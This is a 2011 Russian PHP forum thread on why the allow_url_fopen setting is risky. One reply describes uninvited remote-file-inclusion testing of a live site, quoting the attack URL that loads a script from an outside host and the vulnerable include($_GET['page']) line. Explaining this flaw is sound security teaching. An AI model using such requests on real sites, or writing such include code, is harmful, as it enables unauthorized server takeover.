|
|
|
| у меня на хостинге стоит allow_url_fopen on и magic_quotes_gpc on
я понимаю почему надо magic_quotes_gpc выключать
но как работает allow_url_fopen ? я читал что
Эта опция позволяет использование врапперов fopen, которые поддерживают работу с URL, в функциях include(), include_once(), require(), require_once().
ну как это происходит на практике, то есть чего нехорошего можно ожидать если не отключить? | |
|
|
|
|
|
|
|
для: kvins
(20.08.2011 в 18:08)
| | На практике эта директива несет ответственность за использование сетевых адресов в файловых функциях. Отключите и нельзя будет использовать http:// в пути к сайту, включите - можно будет. Если ваш код не обращается к удаленным сайтам и к самому себе через http:// можно отключить. | |
|
|
|
|
|
|
|
для: cheops
(20.08.2011 в 18:23)
| | и почему его считают плохим ,что все предлагают в темах его отключить? | |
|
|
|
|
|
|
|
для: kvins
(20.08.2011 в 18:55)
| | Теоретически, если вы формируете путь к файлу динамически, особенно в конструкциях include/require, с использованием информации из GET и POST-параметров, не достаточно фильтруя их, то можно запустить на вашем сервере произвольный PHP-код расположенный на удаленном сервере. Т.е. ситуация потенциально опасна. | |
|
|
|
|
|
|
|
для: kvins
(20.08.2011 в 18:55)
| | Cheops всё правильно говорит. Пару лет назад по собственной инициативе анализировал один сайт со ссылками вида /?page=abcd
Сначала добавил кавычку в надежде на sql-иньекцию... но получил гораздо более крутое сообщение об ошибке — "Warning: main(acbd'.php): failed to open stream: No such file or directory in ...". Дальше быстренько сварганил на бесплатном хостинге сайт и запросил http://example.com/?page=http://example.org/hackscript
Вобщем, он подключился и я получил полный доступ к сайту. В итоге, гуляя по скриптам, увидел в чём проблема: include($_GET['page'].'.php');
Отписал на почту владельцу сайта о баге и забыл. Через пару месяцев вернулся на этот сайт и наблюдал дефейс :) я даже не удивился. | |
|
|
|
|
|
|
|
для: Саня
(20.08.2011 в 21:32)
| | Спасибо познавательно было . | |
|
|
|